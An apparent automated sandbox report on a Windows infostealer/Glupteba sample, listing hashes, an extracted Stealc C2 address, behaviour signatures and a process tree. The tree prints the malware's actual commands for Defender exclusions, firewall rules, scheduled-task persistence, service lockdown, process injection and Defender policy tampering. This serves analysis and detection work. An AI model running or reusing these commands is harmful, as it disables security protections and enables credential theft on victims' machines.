Analysis
-
max time kernel
268s -
max time network
267s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
-
submitted
18-04-2024 22:28
Errors
General
-
Target
2aca1abc45a264170f1e9dad15de072ed216b3f56e79f2a721da170c37f1d53d.exe
-
Size
561KB
-
MD5
46a804d527cc255bad3c068d588bff95
-
SHA1
72429d34eef9986b3ad14dce58416c9c5753438a
-
SHA256
2aca1abc45a264170f1e9dad15de072ed216b3f56e79f2a721da170c37f1d53d
-
SHA512
2a3f478451930aa56bc019155a08c1c130f7499b942cf9c01c7809f43b4662010d061fd5b7c10e3c949e9611147b5893db12a59a20e17b3207752b2d7d36a8bc
-
SSDEEP
12288:mj3ByhBS4gUqbBy2O2oQ26EnG/Q7n+chJ:mbBQBSVU52O2oQYG/2n+chJ
Malware Config
Extracted
stealc
http://185.172.128.209
-
url_path
/3cd2b41cbde8fc9c.php
Signatures
-
Glupteba
Glupteba is a modular loader written in Golang with various components.
-
Glupteba payload 18 IoCs
-
Modifies firewall policy service 2 TTPs 1 IoCs
-
Stealc
Stealc is an infostealer written in C++.
-
UAC bypass 3 TTPs 1 IoCs
-
Windows security bypass 2 TTPs 8 IoCs
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
-
Blocklisted process makes network request 4 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 3 IoCs
-
Modifies Windows Firewall 2 TTPs 2 IoCs
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 8 IoCs
-
Executes dropped EXE 30 IoCs
-
Loads dropped DLL 20 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Registers COM server for autorun 1 TTPs 14 IoCs
-
Themida packer 7 IoCs
Detects Themida, an advanced Windows software protection system.
-
Windows security modification 2 TTPs 8 IoCs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 3 IoCs
-
Drops Chrome extension 2 IoCs
-
Drops desktop.ini file(s) 1 IoCs
-
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
-
Drops file in System32 directory 50 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
-
Suspicious use of SetThreadContext 3 IoCs
-
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 32 IoCs
-
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 12 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 4 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 64 IoCs
-
Modifies system certificate store 2 TTPs 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious behavior: MapViewOfSection 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 7 IoCs
-
Suspicious use of SendNotifyMessage 7 IoCs
-
Suspicious use of SetWindowsHookEx 7 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
System policy modification 1 TTPs 1 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\2aca1abc45a264170f1e9dad15de072ed216b3f56e79f2a721da170c37f1d53d.exe"C:\Users\Admin\AppData\Local\Temp\2aca1abc45a264170f1e9dad15de072ed216b3f56e79f2a721da170c37f1d53d.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\2aca1abc45a264170f1e9dad15de072ed216b3f56e79f2a721da170c37f1d53d.exe" -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"2⤵
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Pictures\cRNh43cQ297wWZUJDIv3pgrh.exe"C:\Users\Admin\Pictures\cRNh43cQ297wWZUJDIv3pgrh.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\cRNh43cQ297wWZUJDIv3pgrh.exe"C:\Users\Admin\Pictures\cRNh43cQ297wWZUJDIv3pgrh.exe"4⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Users\Admin\Pictures\1XKvjTI41uZIT8Sdp1mx9835.exe"C:\Users\Admin\Pictures\1XKvjTI41uZIT8Sdp1mx9835.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\u34c.0.exe"C:\Users\Admin\AppData\Local\Temp\u34c.0.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Qg_Appv5.exe"C:\Users\Admin\AppData\Local\Temp\Qg_Appv5.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\Zqicom_beta\UniversalInstaller.exeC:\Users\Admin\AppData\Local\Temp\Zqicom_beta\UniversalInstaller.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\Zqicom_beta\UniversalInstaller.exeC:\Users\Admin\AppData\Roaming\Zqicom_beta\UniversalInstaller.exe6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe7⤵
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe8⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\u34c.1.exe"C:\Users\Admin\AppData\Local\Temp\u34c.1.exe"4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD15⤵
-
C:\Users\Admin\Pictures\fVQOiJigsSHv2QnvBtBjD8yA.exe"C:\Users\Admin\Pictures\fVQOiJigsSHv2QnvBtBjD8yA.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\fVQOiJigsSHv2QnvBtBjD8yA.exe"C:\Users\Admin\Pictures\fVQOiJigsSHv2QnvBtBjD8yA.exe"4⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe5⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll6⤵
- Executes dropped EXE
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)7⤵
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)8⤵
- Launches sc.exe
-
C:\Users\Admin\Pictures\Zr47Tnl8ghcZrk2FmrmXayKM.exe"C:\Users\Admin\Pictures\Zr47Tnl8ghcZrk2FmrmXayKM.exe"3⤵
- Modifies firewall policy service
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\ettoziLtDiYZgJQ0lmietaT9.exe"C:\Users\Admin\Pictures\ettoziLtDiYZgJQ0lmietaT9.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS1558.tmp\Install.exe.\Install.exe /sQwdidHh "385118" /S4⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 22:30:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\PkGgdfl.exe\" em /Mhsite_idffG 385118 /S" /V1 /F5⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\1j8LqRuF1moLtXiMLutPzk8B.exe"C:\Users\Admin\Pictures\1j8LqRuF1moLtXiMLutPzk8B.exe" --silent --allusers=03⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Pictures\1j8LqRuF1moLtXiMLutPzk8B.exeC:\Users\Admin\Pictures\1j8LqRuF1moLtXiMLutPzk8B.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x2a0,0x2a4,0x2a8,0x27c,0x2ac,0x6eace1d0,0x6eace1dc,0x6eace1e84⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\1j8LqRuF1moLtXiMLutPzk8B.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\1j8LqRuF1moLtXiMLutPzk8B.exe" --version4⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\Pictures\1j8LqRuF1moLtXiMLutPzk8B.exe"C:\Users\Admin\Pictures\1j8LqRuF1moLtXiMLutPzk8B.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=4584 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240418222912" --session-guid=dde51546-29a5-4f76-93de-8dd691263108 --server-tracking-blob="YWNiY2FmYTdiMmNjZGU4ZmI5Y2FjYTVlYzUxZGE2NWE5NDI1MzgwN2I3YjUwYTQ1MDkwM2JhMWQ2ZTViZDc2Njp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N19fNDU2Iiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTAiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzEzNDc5MzExLjg3MTciLCJ1dG0iOnsiY2FtcGFpZ24iOiI3NjdfXzQ1NiIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6Im1rdCJ9LCJ1dWlkIjoiYjdjNTgxZmItN2QyZC00OTBmLWJmYmItOTYzMDhkNmFiMGUxIn0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=54040000000000004⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
-
C:\Users\Admin\Pictures\1j8LqRuF1moLtXiMLutPzk8B.exeC:\Users\Admin\Pictures\1j8LqRuF1moLtXiMLutPzk8B.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x2ac,0x2b0,0x2b4,0x27c,0x2b8,0x6da0e1d0,0x6da0e1dc,0x6da0e1e85⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404182229121\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404182229121\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404182229121\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404182229121\assistant\assistant_installer.exe" --version4⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404182229121\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404182229121\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x230,0x234,0x238,0x20c,0x23c,0x376038,0x376044,0x3760505⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\Pictures\WlP9SkLk6kkMFBigMnDddLc3.exe"C:\Users\Admin\Pictures\WlP9SkLk6kkMFBigMnDddLc3.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce-installer_7.14.2_vbox-6.1.20.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce-installer_7.14.2_vbox-6.1.20.exe4⤵
- Executes dropped EXE
-
C:\Windows\SYSTEM32\msiexec.exe"msiexec.exe" /qn /i VirtualBox-6.1.20-r143896.msi ADDLOCAL=VBoxApplication,VBoxPython VBOX_INSTALLDESKTOPSHORTCUT=0 VBOX_INSTALLQUICKLAUNCHSHORTCUT=0 /log "C:\Users\Admin\AppData\Local\Temp\charityengine-install-vbox-log.txt"5⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce_7.14.2_windows_x86_64.exe"ce_7.14.2_windows_x86_64.exe" /S /v"/qn ACCTMGR_LOGIN=anonymous ACCTMGR_PASSWORDHASH=S16-01 /norestart /log C:\Users\Admin\AppData\Local\Temp\charityengine-install-ce-log.txt"5⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Windows\SYSTEM32\MSIEXEC.EXEMSIEXEC.EXE /i "C:\Windows\Downloaded Installations\{97657C9B-F62F-4B80-92E3-C146A666778F}\Charity Engine.msi" /qn ACCTMGR_LOGIN=anonymous ACCTMGR_PASSWORDHASH=S16-01 /norestart /log C:\Users\Admin\AppData\Local\Temp\charityengine-install-ce-log.txt SETUPEXEDIR="C:\Users\Admin\AppData\Local\Temp\IXP000.TMP" SETUPEXENAME="ce_7.14.2_windows_x86_64.exe"6⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"2⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\PkGgdfl.exeC:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\PkGgdfl.exe em /Mhsite_idffG 385118 /S1⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows 